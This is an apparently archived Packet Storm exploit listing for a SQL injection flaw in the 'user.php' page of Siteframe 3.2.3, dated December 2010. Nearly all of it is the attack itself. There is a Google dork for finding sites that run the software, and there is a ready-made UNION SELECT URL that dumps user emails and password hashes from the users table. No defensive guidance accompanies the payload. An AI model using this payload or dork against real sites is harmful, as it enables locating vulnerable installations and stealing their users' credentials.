Siteframe 3.2.3 SQL Injection

2010-12-29T00:00:00
ID PACKETSTORM:97159
Type packetstorm
Reporter AnGrY BoY
Modified 2010-12-29T00:00:00

Description

                                        
                                            `# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability  
# Google Dork: "powered by Siteframe"  
# Date: 29/12/2010  
# Author: AnGrY BoY  
# Software Link: http://sitefrane.org/downloads/  
# Version: Siteframe 3.2.3  
# Tested on: windows SP2  
# CVE : N/A  
  
# expolit:  
  
# http://localhost/path/user.php?id=[SQL]  
  
# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--  
  
======================================================================================  
# Special Thanks:- all h4kurd members  
  
`